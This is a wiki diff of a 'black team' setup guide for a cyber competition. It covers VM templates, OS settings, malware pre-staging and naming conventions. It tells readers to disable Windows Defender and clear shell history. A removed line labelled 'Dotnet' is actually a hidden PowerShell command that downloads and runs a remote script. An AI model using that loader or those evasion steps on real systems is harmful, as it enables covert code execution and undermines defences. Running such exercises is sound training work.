guides:lockdown_black_team

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision
Previous revision
guides:lockdown_black_team [2019/12/19 04:44]
aibekzhy Swappiness
guides:lockdown_black_team [2020/06/08 05:49] (current)
aibekzhy
Line 18: Line 18:
     - Copy Paste Enabled     - Copy Paste Enabled
     - Graphics to support Full HD/​Automatic Graphics Detection     - Graphics to support Full HD/​Automatic Graphics Detection
 +    - Ensure time Synchronized
 +    - Potentially disable DHCP
 +    - Make sure the best NIC type is attached "​vmxnet3"​ -> "​vmxnet2"​ -> etc
  
   * Linux:   * Linux:
Line 24: Line 27:
     - SSH server (installed, enabled, running)     - SSH server (installed, enabled, running)
     - Decrease swappiness to 10     - Decrease swappiness to 10
-    - Ubuntu specific:+    ​- Python2 and python3 installed (less headache if you are using ansible) 
 +    ​- Ubuntu-specific:
       - Ensure networkd is a renderer       - Ensure networkd is a renderer
 +      - Install resolvconf to configure DNS on 18.*
     - Fedora specific:     - Fedora specific:
       - Depending on implementation look into installing network-scripts       - Depending on implementation look into installing network-scripts
       - Install libselinux-python       - Install libselinux-python
     - Ensure Release of child OSes match supported OS: https://​kb.vmware.com/​s/​article/​1005870     - Ensure Release of child OSes match supported OS: https://​kb.vmware.com/​s/​article/​1005870
 +
 +
   * Windows:   * Windows:
     - VMWare tools     - VMWare tools
Line 37: Line 44:
     - Ensure that Windows Remote Management service is started Automatically     - Ensure that Windows Remote Management service is started Automatically
     - Enable Ping via Firewall (Allow ICMP Packets)     - Enable Ping via Firewall (Allow ICMP Packets)
-    - Disable Windows Defender (Registry/​GPO)+    - Disable/​Uninstall ​Windows Defender (Registry/​GPO)
     - Disable Windows Updates (Registry/​GPO/​Services)     - Disable Windows Updates (Registry/​GPO/​Services)
     - Ensure Sleep is disabled     - Ensure Sleep is disabled
-    - Try to Debloat as much as possible: https://​github.com/​Sycnex/​Windows10Debloater+    - Try to Debloat as much as possible: https://​github.com/​Sycnex/​Windows10Debloater ​(Might not worth it) 
 +    - Sometimes windows may start randomly shutting down. In which case please look into the following 
 +    - Use High-performance Battery Profile 
 +    - Windows 10 Enterprise specific: 
 +      - Make sure when Template is deployed, it has an Ethernet Access. If it doesn'​t have one, it will reboot endlessly: https://​superuser.com/​questions/​933754/​why-does-windows-10-shut-down-hourly-with-initiated-power-off-on-behalf-of-nt-a  
  
   * Pfsense:   * Pfsense:
Line 51: Line 63:
   * Ensure you clean up the history of all applications/​shells   * Ensure you clean up the history of all applications/​shells
   * Ensure you take a snapshot of the entire infrastructure after deploying your malware   * Ensure you take a snapshot of the entire infrastructure after deploying your malware
 +  * Manually login to every VM after the red team is done pre-staging. This ensures that everything is still operational,​ and in addition, it loads a lot of things from disk to memory, which ensures a smoother experience at the start of the competition. ​
 +  * If the performance of VMs is very slow, try to lower the number of snapshots or use the snapshots that were created are no longer than a day before the competition.
  
  
Line 66: Line 80:
  
 Things that are typically requested: Things that are typically requested:
-  * Windows: Dotnet ​(powershell.exe -Sta -Nop -w hidden -Command "​IEX(IWR 'https://raw.githubusercontent.com/NotoriousRebel/​temppp/​master/​builder.ps1?​token=AIVA5C62REQKCZAXPVLPOUS5TAWXC'​ -UseBasicParsing)"​)+  * Windows: ​ 
 +    * Dotnet https://dotnet.microsoft.com/download 
 +    * Python executables
   * C2 Servers   * C2 Servers
 +  * 
 ===== Naming Conventions ===== ===== Naming Conventions =====
  
Line 103: Line 120:
  
 **Note: %02d just represents a padded 0.** **Note: %02d just represents a padded 0.**
 +
 +Aibek to Aibek: PLEASE FIX ANSIBLE RELATIVE PATHING
  • guides/lockdown_black_team.1576730671.txt.gz
  • Last modified: 2019/12/19 04:44
  • by aibekzhy